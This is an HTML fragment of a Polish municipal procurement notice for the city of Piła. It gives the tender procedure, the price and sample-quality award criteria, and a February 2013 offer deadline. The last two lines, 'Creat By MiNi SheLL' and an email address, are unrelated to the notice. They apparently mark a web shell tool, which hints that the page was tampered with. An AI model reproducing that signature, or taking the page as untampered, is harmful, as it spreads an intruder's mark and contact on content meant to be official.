<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość na podstawie dostarczonych próbek - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2013 godzina 09:00, miejsce: siedziba Zamawiającego pok. 134  piętro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com